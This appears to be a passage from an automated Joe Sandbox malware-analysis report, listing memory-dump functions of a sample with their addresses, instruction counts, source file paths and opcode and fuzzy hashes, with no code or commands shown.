                                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                            • Instruction ID: a3b259c13e627a80770c3c463ae8b7ac72da048810f127375456a1bdb2804c88
                                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                            • Instruction Fuzzy Hash: 49F0127210001DBFEF019F94DD81DEF7B7EEB55398B104125FA1192160D676DD21ABA0
                                                            Function 0101A4B0 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94109b44000ae4469855996275dad159a8c3a863f62041058a4a44d089cca959
                                                            • Instruction ID: 989d87a35769ee6763f8611c220ee423fbea5d0efa48e1062b38c6507308c23b
                                                            • Opcode Fuzzy Hash: 94109b44000ae4469855996275dad159a8c3a863f62041058a4a44d089cca959
                                                            • Instruction Fuzzy Hash: 1A018936205149EBCF129E84DC40EDE7FA6FB4C654F058101FE5966224C73AD970EB81
                                                            Function 00F8C0F0 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66415846c7937a162d1dc145a829b703c7981fa98564f9538d291f3c722e948f
                                                            • Instruction ID: 2cb55fae0e59bae8a4f8641ee730bc7bb74e155a3950ff9732f7667796579db2
                                                            • Opcode Fuzzy Hash: 66415846c7937a162d1dc145a829b703c7981fa98564f9538d291f3c722e948f
                                                            • Instruction Fuzzy Hash: 6FF02B727047405BF710B5159C45BA23295D7D0764F29807AE6058B2C3E974DC01A3F4
                                                            Function 00FC656A Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be1e0eefd6fa9efa733f3a5d78e68d98f8e042b7bae019cda15a929a01eee908
                                                            • Instruction ID: fa2804136ed640c1da21e0ccd63469dbb06e0cb1eb60899c2b6ccef7ab5e42d7
                                                            • Opcode Fuzzy Hash: be1e0eefd6fa9efa733f3a5d78e68d98f8e042b7bae019cda15a929a01eee908
                                                            • Instruction Fuzzy Hash: 1501F470648781DBF3339B6CCE0AF2933E4AB44B04F5C4594BA81CB6DAE72CD9019214
                                                            Function 0103437C Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                            • Instruction ID: b848d627c71e0692d20f061ebc88ffea6bd1e2faf1398a49801e6fa3cfb80c7c
                                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                            • Instruction Fuzzy Hash: E3F02E35745D1347EBB5AA2E8860B2EB6DDAFC0E00B05857CA5C1DF640DF20DC00C780
                                                            Function 0101E872 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                            • Instruction ID: 4cea6c1784b8865748f889cf2beabff8a06fd24eb49e92b8559be00a782c6eb1
                                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                            • Instruction Fuzzy Hash: F2F05472B115119FD3229A4DDC80F1AB7E9AFC5A60F590075BE489B268C768EC4187D0
                                                            Function 0101C89D Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30561649d344de272ee7c90e8def7e6823a2c0a9f22a18d8829d616ed0474549
                                                            • Instruction ID: 2f5cecdea97ffd730bb11bd11d9b6d0934ce6f58e9eb79b27ff2795f3f9254a6
                                                            • Opcode Fuzzy Hash: 30561649d344de272ee7c90e8def7e6823a2c0a9f22a18d8829d616ed0474549
                                                            • Instruction Fuzzy Hash: 40F0A4706153049FD310EF68C946A1EB7E4EF48710F44465ABCD4DB395E638EA00C756
                                                            Function 00FC0854 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                            • Instruction ID: 49402a8fe0f1e4a7114fad669051e8044b9b48d7e271c73ec5a75b19e87bfed7
                                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                            • Instruction Fuzzy Hash: 04F0B472610205EFE714DB21CD02F96B2EDEF98750F14C0789545D71A4FAB4DE02E654
                                                            Function 0101C912 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ac8a773137f82fa1198f51498998dcc5e05bbdb6f3a1fdd10d53cd60c7bb462
                                                            • Instruction ID: de6f8b17d7e10ee46b8672badf568a730cda4db28ef1cc3f18130f08b9c6c5b9
                                                            • Opcode Fuzzy Hash: 6ac8a773137f82fa1198f51498998dcc5e05bbdb6f3a1fdd10d53cd60c7bb462
                                                            • Instruction Fuzzy Hash: A3F04FB0A01249DFDB04EFA9C516A5EB7B5EF08300F008066B955EB395DA38EA01CB54
                                                            Function 00F947FB Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3bbda1466040b972c700e13da1c17384fad1c58138cc7a8381b678043ee6604e
                                                            • Instruction ID: 85e7f2ed0a26ceabb28a819e65f39e31c2e7ebee86a9d94a51cd076b753eca19
                                                            • Opcode Fuzzy Hash: 3bbda1466040b972c700e13da1c17384fad1c58138cc7a8381b678043ee6604e
                                                            • Instruction Fuzzy Hash: 63F09A32D166E09EFF328B68C444F61B7D8AB21730F1D8DAAD49987502D764FC82E650
                                                            Function 01050115 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 355094b70a8cb2e5cb85e9ff942d404700dfe46901dcb07a0a4b27c0212c0536
                                                            • Instruction ID: d59dc52492c0af3fed40f4f155e0b45f4620b5221352b5040083fffec05a2428
                                                            • Opcode Fuzzy Hash: 355094b70a8cb2e5cb85e9ff942d404700dfe46901dcb07a0a4b27c0212c0536
                                                            • Instruction Fuzzy Hash: F5F0E2B641968506CBB26A2CA5A02DA3B98A762210F0A10D9D8E05B209C57A8483C369
                                                            Function 00FCC5ED Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7f066c1e44bb01cef4a7764f4fbd47cedaf86d3873a09899c4359b9057d6ca6
                                                            • Instruction ID: 770e428df80a78426fc6d3459e92e9425aa5dffdb0879ffe2f24dffde77d1186
                                                            • Opcode Fuzzy Hash: f7f066c1e44bb01cef4a7764f4fbd47cedaf86d3873a09899c4359b9057d6ca6
                                                            • Instruction Fuzzy Hash: 4DF0E2B29116529FC3229728C349F5173D8AB81BB0F1D952DD40EC7512C364CC80FAD0
                                                            Function 00FD2619 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                            • Instruction ID: 46b83840ae0a80bb2336989e6fa8aefb7b6a21b5e581f8886649665c7d8f02b5
                                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                            • Instruction Fuzzy Hash: 86E0D872300A002BD7129E59CCC5F47776FEFD2B10F08007AB5045F352C9E6DD0996A4
                                                            Function 01026030 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                            • Instruction ID: 5bd249014f6ef5393082e0361ca66678b47e76fe6f075d5ebeb301639c01f100
                                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                            • Instruction Fuzzy Hash: C9F08C721002149FE3218F09D880B53B7F8EB05364F018065FA088B161D33EEC40DBA4
                                                            Function 00F90710 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                            • Instruction ID: 4bdc4d9e6c5d696110250f70e0e2477c0ee742d12c1f51814a0b18aa21d6c140
                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                            • Instruction Fuzzy Hash: EFF0E57A204354DFEB15DF56E040AD57BA4EB51370F140055F8428B341EB31FD81EB41
                                                            Function 00FC49D0 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                            • Instruction ID: 5b946d0d4405a776f244aeb94b8109ab6e778a09af3879727fe6365d12ebd698
                                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                            • Instruction Fuzzy Hash: E5E09233684547ABC3211E558912F6676A59BD17A0F15042DE1028B150DB78EC40F798
                                                            Function 01064164 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 38ba2e0bd0439e94bf77aae47627a50c96493b6f06187e093fdf6c8f4c974b7e
                                                            • Instruction ID: 8b7acb875dd04d9c17885c6b5de7121d58a5f7fd33e16b93b44cc123566b12b0
                                                            • Opcode Fuzzy Hash: 38ba2e0bd0439e94bf77aae47627a50c96493b6f06187e093fdf6c8f4c974b7e
                                                            • Instruction Fuzzy Hash: D8F0E531A26591CFE7B2D72CE650B5177E8AB10730F0A15D4D480CB912C324DC80C690
                                                            Function 0103678E Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                            • Instruction ID: ffe9e485e21cc9f5e4c6858f4e6aa3a6ea23a5f81484250b0510fc6b928d9bcd
                                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                            • Instruction Fuzzy Hash: 42E0DF72A00110BBDB22A7998E02F9ABEBCEB80FA0F050054B602E7090E531EF00D6A0
                                                            Function 010608C0 Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                            • Instruction ID: 3b8a077a21423cb4982ba87f869490b507ac70082426cc1d366ecd77a3ca5275
                                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                            • Instruction Fuzzy Hash: B0E09B316803518FCB25CA1EC140A97B7ECDFD56A0F1580A9E9D547616C271F842C6D0
                                                            Function 00F925E0 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e4967b9a4c4491c4c39942b81a76eca8ab62899a9438e9950190584109c1e106
                                                            • Instruction ID: 784430cbde6e9b1920d75b186fe05cefe533c1ea61062c31a4bef91c7026162e
                                                            • Opcode Fuzzy Hash: e4967b9a4c4491c4c39942b81a76eca8ab62899a9438e9950190584109c1e106
                                                            • Instruction Fuzzy Hash: 46E09272100594ABC721BB29DD02F8B77AAEFA5364F014515B15557191CB39AD10D7C8
                                                            Function 0104A456 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                            • Instruction ID: e95dbadfb2f95d1639a2ee4f84a8a17bee654f9dc85977a2987ddf6b15ea9b30
                                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                            • Instruction Fuzzy Hash: 70E06D71050610DFE7726B2ADD49B96BAE5AFC0711F188C6DB0DB125B1CBB89881DA80
                                                            Function 01014000 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                            • Instruction ID: 48265f531c64263717e086a34eae64b83be43f59a6fb43ced9cc91700cc5c2ee
                                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                            • Instruction Fuzzy Hash: 16E0C9343003058FE755CF1AC054B527BF6BFD5B10F28C0A8A9888F209EB36E842CB40
                                                            Function 00FCCA38 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61da3917e31fb8cf96ce93c52095c004c03f370fe79bfc5ccbd1dbb846a653f2
                                                            • Instruction ID: a503332ff191457a1de9b70f66230d2298cd056b28f3fb541b234f49de5c0131
                                                            • Opcode Fuzzy Hash: 61da3917e31fb8cf96ce93c52095c004c03f370fe79bfc5ccbd1dbb846a653f2
                                                            • Instruction Fuzzy Hash: F8D02B328854216ACB38F115BD1EFE73A599B41720F014864F10CD2010D51DCC81B6C4
                                                            Function 00F8823B Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                            • Instruction ID: c7cad4b920f0d0b1737694bfd2c50f37f52db34de0d0abeeff7bd359ecc890eb
                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                            • Instruction Fuzzy Hash: E9E0CD32401620EFD7313F11DC01F9177A2FF94B60F24482BF081160658BB45C82FB44
                                                            Function 00F92050 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8adcc714841c94d2d1d370b9b30f9b48482ae54fcf7a53ed49cdb4891b6b2525
                                                            • Instruction ID: 711dc989d063ce6e3bf50e36de7c24b375b14e52df46da86dd95586867c1d87d
                                                            • Opcode Fuzzy Hash: 8adcc714841c94d2d1d370b9b30f9b48482ae54fcf7a53ed49cdb4891b6b2525
                                                            • Instruction Fuzzy Hash: 30E0C2321004906BC711FB5DED02F4A73AEEFA5370F010121F190976D1CB29BD01D798
                                                            Function 00FC8A90 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                            • Instruction ID: d97f0c96e64cdea00d691edf6b53a134b0c7d23032f0a8079d66f93f0ea5680c
                                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                            • Instruction Fuzzy Hash: 9AE08633511A1497C728DE18D512B7277A4FF45770F19463EA51347790C934E944D794
                                                            Function 00FE6AA4 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                            • Instruction ID: c137e623f2891608cd7afb3380bf65f651f3a803f0b9e5c013a15f413ff87d03
                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                            • Instruction Fuzzy Hash: 9BD01736911A50AFC3329F1BEE00813BAF9FBC5B60705062EA44592920C674A806DAA0
                                                            Function 00FCE59C Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                            • Instruction ID: f0e8614498f7304f06008e2299fca847ae4307e956d67dbc230c1bbd015dbde7
                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                            • Instruction Fuzzy Hash: 10D0A932614620AFE772AA1CFC00FC373E9AB88720F060499B008C70A2C364AC81CA84
                                                            Function 0100E908 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                            • Instruction ID: eabe876818e3d27b4559add11a112908f5f95e2ac1f55f83caae667c96fc1229
                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                            • Instruction Fuzzy Hash: 75E08C31910680AFEF53DF98CA40F4ABBF5BB80B40F140448B1486B261C228A900CB40
                                                            Function 00F8A0E3 Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction ID: dfcbe58f0eb18712ce34480f807f6e2cb8ec26e21b03624dec522b24b0a4e845
                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction Fuzzy Hash: F7D02233626030A7DF2866606C04FA3B906DB81BA0F1A002E340AA3800C0088C42F7E0
                                                            Function 00FCA830 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                            • Instruction ID: 2a97526bb0b2f8e511baf4aa9439ae92101fd51e7ce62e38724e5a5e361784b9
                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                            • Instruction Fuzzy Hash: AFD012771E054CBBCB119F65DC02F957BA9E755BA0F444020B504875A1C63AE950D584
                                                            Function 00FCCA24 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb3969a05058a54a738a0593110fd69f8e6f0f470a3def68e833e3f140ac0c79
                                                            • Instruction ID: e3a2b8c647e780e9e62035afb10debea06266dfe0a16ca6b8de468db8070eec7
                                                            • Opcode Fuzzy Hash: bb3969a05058a54a738a0593110fd69f8e6f0f470a3def68e833e3f140ac0c79
                                                            • Instruction Fuzzy Hash: F2D05E309150069BDF17CB04CA29E3E76B0FB44740F45006CE68051020DB2EDC01A640
                                                            Function 00FA02A0 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
